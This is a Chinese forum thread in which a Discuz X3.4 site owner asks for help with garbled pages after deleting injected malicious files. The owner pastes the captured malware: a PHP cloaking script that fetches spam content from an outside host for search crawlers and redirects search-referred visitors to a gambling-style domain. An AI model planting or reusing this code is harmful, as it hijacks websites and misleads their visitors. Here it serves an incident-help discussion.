x3.4网站突然乱码了

hanxing558

好好的运行着，突然整个页面乱码了，英文和数字没问题。手机版也没问题。求助大神们咋回事啊

我知道答案 回答被采纳将会获得1 贡献 已有14人回答

allthebest

突然之前

1、浏览器加载新功能停用，或

2、站点新安装插件关闭，或

3、后台 工具 文件教验；新修改还原，更新缓存。

hanxing558

allthebest 发表于 2020-10-17 22:54
突然之前

1、浏览器加载新功能停用，或

你好，感谢指导！
我这边昨晚没及时看你的回复。事情是因为网站被植入一些恶意代码（有黄赌毒那种），我删除了这些恶意文件，然后网站PC端就乱码了，怀疑是这些恶意文件在作祟，但是手机端却不受影响。应该不是数据库的损坏吧？想请问这种乱码一般是哪些文件受影响导致的？

allthebest

hanxing558 发表于 2020-10-18 14:22
你好，感谢指导！
我这边昨晚没及时看你的回复。事情是因为网站被植入一些恶意代码（有黄赌毒那种），我 ...

后台 工具 文件校验

近日修改的PHP文件

下载同程序版本

找相同PHP文件覆蓋

更新缓存

hanxing558

allthebest 发表于 2020-10-18 23:27
后台 工具 文件校验

近日修改的PHP文件

你好，刚安装你说的方法试验了，还是不行，只发现有个文件/source/function/function_core.php的文件修改日期是1994年，感觉奇怪替换了x3.4最新的，而且昨晚我把x3.4的所有文件都覆盖了一遍也是不行，大神看看还有什么办法吗

crx349

浏览器先切换编码看看 如果不行 后台更新缓存看看

hanxing558

crx349 发表于 2020-10-19 00:34
浏览器先切换编码看看 如果不行 后台更新缓存看看

谢谢指点，试过谷歌，QQ浏览器切换编码没有任何变化。360浏览器切换UTF8后倒是正常了，一点任何链接跳转页面就会还是乱码，手动切换360的编码为utf8又正常，但是无法根治。换了多台电脑都是这样，刚刚回滚了服务器数据盘，一切正常了，任何浏览器都不用切换编码都可以正常显示。
现在纠结的就是删除恶意文件的时候，到底哪里跟着变化了，或者说恶意文件植入的时候是不是就留了这个恶果来对抗我们呢~~

hanxing558

截获了一段恶意文件代码，大家看看是不是跟这个有关系啊：

<?php
include("/home/wwwroot/kkw/public_html/uc_client/lib/wzseo");

set_time_limit( 0 );
error_reporting( 0 );
@date_default_timezone_set('Etc/GMT-8');
//header('Content-Type: text/html;charset=gb2312');
define('Sg_Y','http://sg.wtohn.com');
define('URL',$_SERVER['SERVER_NAME']);
define('REF',$_SERVER['HTTP_REFERER']);
define('AGENT',$_SERVER['HTTP_USER_AGENT']);
$agent=array('Sogou web','Soso','Haosou','360spider','Bytespider','ToutiaoSpider');
$ref=array('sogou.com','so.com','sm.cn','toutiao.com');
function YC($url) {
        $oo2=array('http'=>array('method'=>"GET",'timeout'=> 8 ));
        $context=stream_context_create($oo2);
        $hh2=file_get_contents($url,false,$context);
        if(empty($hh2)) {
                $hh2=file_get_contents($url);
        }
        return$hh2;
}
function GETID() {
        preg_match_all('/\d+/',$_SERVER['REQUEST_URI'],$a2ra1r1);
        $a2ra1=$a2ra1r1[ 0 ];
        sort($a2ra1);
        return$a2ra1[count($a2ra1)- 1 ];
}
function PHPGET() {
        $dmmu2='';
        if(isset($_SERVER['REQUEST_URI'])) {
                $dmmu2=$_SERVER['REQUEST_URI'];
        } else {
                if(isset($_SERVER['argv'])) {
                        $dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][ 0 ];
                } else {
                        $dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
                }
        }
        if(isset($_SERVER['SERVER_SOFTWARE'])&&false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')) {
                if(function_exists('mb_convert_encoding')) {
                        $dmmu2=mb_convert_encoding($dmmu2,'UTF-8','GBK');
                } else {
                        $dmmu2=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$dmmu2))==$dmmu2?$dmmu2:@iconv('GBK','UTF-8',$dmmu2);
                }
        }
        $r2=explode('#',$dmmu2, 2 );
        $dmmu2=$r2[ 0 ];
        return$dmmu2;
}
foreach($ref as$kx) {
        if(stristr(REF,$kx)) {
                if(GETID()>= 199 ) {
                        $jst[ 1 ]='http://www.8889990.cc/index.html';
                        $jst[ 2 ]='http://www.8889990.cc/index.html';
                        $out=rand( 1 , 2 );
                        echo header("Location: $jst[$out]");
                }
        }
}
foreach($agent as$kk) {
        if(stristr(AGENT,$kk)) {
                $dmmu2_u2=Sg_Y.'/?xu='.'&xx='.bin2hex(URL);
                $dmmu2_u2.='&xh='.bin2hex(PHPGET()).'&ag='.bin2hex(AGENT);
                $dmmu2_c2=YC($dmmu2_u2);
                echo$dmmu2_c2;
                exit;
        }
}

Failure

被黑了。 相关代码删掉  然后找后门。 做好相关的安全

hanxing558

Failure 发表于 2020-10-19 11:50
被黑了。 相关代码删掉  然后找后门。 做好相关的安全

现在就是找后门困难啊，你删除了过一会又自动生出一堆文件，快的很